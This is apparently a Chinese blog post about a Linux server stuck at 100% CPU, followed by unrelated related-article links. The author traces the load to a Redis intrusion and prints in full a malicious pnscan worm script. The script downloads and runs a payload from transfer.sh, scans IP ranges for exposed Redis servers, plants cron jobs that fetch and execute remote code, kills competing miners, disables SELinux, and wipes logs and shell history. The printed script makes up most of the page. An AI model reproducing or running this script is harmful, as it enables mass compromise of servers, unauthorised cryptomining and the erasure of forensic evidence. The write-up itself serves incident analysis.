1: top 查看

>top -c

此时 我们使用kill -9 15003, 杀掉这个进程短暂的CPU降低几秒, 然后死灰复燃了, 又一个进程占了CPU 99%

2: 查看15003 进程状态,

> cat /proc/15003/status

Pid  :当前进程ID

PPid:当前进程的父进程  此时执行2次杀进程

kill - 

kill -

如果还是不行,本博主也不知道,重启服务器...

第二天发现一个问题redis 出现了Backup 3个key,存了一个url  https://transfer.sh/W5hJO/tmp.p9ArkdNk6P

打开连接,下载了tmp.p9ArkNK6p文件, 使用Notepad++打开, 发现最新型的pnscan病毒

sleep

find . -maxdepth  -name ".mxff0" -type f -mmin + -delete

[ -f .mxff0 ] && exit

echo  > .mxff0

trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT

setenforce  >/dev/null

echo SELINUX=disabled > /etc/sysconfig/selinux >/dev/null

crontab -r >/dev/null

rm -rf /var/spool/cron >/dev/null

grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf

rm -rf /tmp/* 2>/dev/null

rm -rf /var/tmp/* 2>/dev/null

rm -rf /etc/root.sh 2>/dev/null

sync && echo 3 > /proc/sys/vm/drop_caches

cat <<EOF> /etc/security/limits.conf

*         hard    nofile      100000

*         soft    nofile      100000

root      hard    nofile      100000

root      soft    nofile      100000

*         hard    nproc       100000

*         soft    nproc       100000

root      hard    nproc       100000

root      soft    nproc       100000

EOF

iptables -I INPUT 1 -p tcp --dport 6379 -j DROP

iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT

ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done

rm -rf /tmp/* 2>/dev/null

rm -rf /var/tmp/* 2>/dev/null

echo 0 > /var/spool/mail/root

echo 0 > /var/log/wtmp

echo 0 > /var/log/secure

echo 0 > /root/.bash_history

YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"

DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"

if cat /etc/*release | grep -i CentOS; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Red; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Fedora; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Ubuntu; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update -q --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Debian; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Mint; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Knoppix; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

else

exit 1

fi

sleep 1

if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

sleep 1

[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

fi

tname=$( mktemp )

OMURL=https://transfer.sh/HlrkQ/tmp.gIMakllioJ

curl -s $OMURL > $tname || wget -q -O $tname $OMURL

NMURL=$( curl -s --upload-file $tname https://transfer.sh )

mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

[ -z "$NMURL" ] && NMURL=$OMURL

ncmd=$(basename $(mktemp))

sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd

NSURL=$( curl -s --upload-file $ncmd https://transfer.sh )

echo 'flushall' > .dat

echo 'config set dir /var/spool/cron' >> .dat

echo 'config set dbfilename root' >> .dat

echo 'set Backup1 "\t\n*/ * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat

echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat

echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat

echo 'save' >> .dat

echo 'config set dir /var/spool/cron/crontabs' >> .dat

echo 'save' >> .dat

echo 'exit' >> .dat

pnx=pnscan

[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

for x in $( seq   | sort -R ); do

for y in $( seq   | sort -R ); do

$pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/  > .r.$x.$y.o

awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw &

done < .r.$x.$y.l

done

done

echo  > /var/spool/mail/root >/dev/null

echo  > /var/log/wtmp >/dev/null

echo  > /var/log/secure >/dev/null

echo  > /root/.bash_history >/dev/null

exit

Linux CPU 100%, kill -9 杀不掉进程的更多相关文章

  1. Linux---使用kill杀不掉进程解决方案

    今天打开Linux虚拟机,然后使用jps命令查看,莫名奇妙多了一个1889进程 然后使用kill杀掉后,再运行jps还是存在此进程.于是乎开始大量百度,最终找到了解决方案. 说的很清楚了,杀不掉的原因 ...

  2. PostgreSQL 不要使用kill -9 杀 Postgresq 用户进程

    转载:http://francs3.blog.163.com/blog/static/4057672720109854858308/ Postgresql 8.3.3 今天应用反映数据库很慢,有些SQ ...

  3. linux cpu 100% 脚本

    for i in `seq 1 $(cat /proc/cpuinfo |grep "physical id" |wc -l)`; do dd if=/dev/zero of=/d ...

  4. Linux系统cpu 100%修复案例

    Linux系统cpu 100%修复案例 ​阿里云技术支持团队:完颜镇江 案例背景: Linux主机连续三天CPU% 处理思路: 1.  登录服务器查看/var/log/messages+/var/lo ...

  5. ora-00031:session marked for kill处理oracle中杀不掉的锁

    http://www.cnblogs.com/songdavid/articles/2223869.html 一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定 ...

  6. 【转】ora-00031:session marked for kill处理oracle中杀不掉的锁

    一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...

  7. ORA-00031: session marked for kill 处理Oracle中杀不掉的锁

    一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...

  8. session marked for kill处理oracle中杀不掉的锁

    ora-00031:session marked for kill处理oracle中杀不掉的锁   一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长 ...

  9. 如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之

    转自:如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之 用ps和grep命令寻找僵尸进程#ps -A -ostat,ppid,pid,cmd | grep -e '^[Zz]'命令注解:-A ...

随机推荐

  1. UVA-11419 SAM I AM (最小点覆盖)

    题目大意:在一个n*m的网格中,有k个目标,现在可以任选一行或列消除在其上的所有目标,求出最少选择次数及选法. 题目分析:经典的最小点覆盖问题,并且输出一个最小点覆盖集.在求出最大匹配之后,以未覆盖的 ...

  2. [批处理]Oracle启动助手

    前段日子开始学Oracle数据库,但是由于Oracle数据库的服务启动时间很长 所以机房的里面所有电脑的Oracle服务全部是被禁用的 所以每次上机使用的时候都要先进服务管理,然后把禁用更改为手动模式 ...

  3. maven打包资源文件(转)

    原文链接:http://blog.csdn.net/u012849872/article/details/51035938 maven工程标准目录结构: src    -main       –bin ...

  4. L187 DKK2

    Why can millions of hairs grow from our heads, and yet our palms手掌 and the soles of our feet are as ...

  5. timer Compliant Controller project (3)--bom and sch

    After optimization of structural solution , I  must prepare the bom and  drawing circuit diagram as ...

  6. memcache+php实现页面访问的加速

    一.什么是memcache memcache是目前主流的一个高性能的分布式内存对象缓存系统:它以key-value形式在内存中存储数据.由于数据缓存在内存中,所以相比操作DB而言,它不需要解析SQL. ...

  7. npm 与 package.json 快速入门

    npm 是前端开发广泛使用的包管理工具,之前使用 Weex 时看了阮一峰前辈的文章了解了一些,这次结合官方文章总结一下,加深下理解吧! 读完本文你将了解: 什么是 npm 安装 npm 更新 npm ...

  8. windows 实用小工具(截图、进程管理)

    1. 截图 picpick:PicPick-NGWIN,一款全功能的设计工具,包含屏幕截图.图片编辑器.颜色选择器.像素标尺和其它更多的功能 2. 二进制/十六进制 十六进制(二进制)编辑器 3. p ...

  9. 【.NET】AutoMapper学习记录

    在两个不同的类型对象之间传输数据,通常我们会用DTOs(数据传输对象),AutoMapper就是将一个对象自动转换为另一个对象的技术 背景 一些orm框架,在用到Entity的时候有一些开源代码用到了 ...

  10. node.js + express 初体验【hello world】

    [node.js]  一个神奇的XX 呵呵 :) 不知道怎么形容他才好! [express] 是node.js 开发web应用程序的框架 开发环境:XP 大家共同进步吧 :) 一:前期准备: 1:下载 ...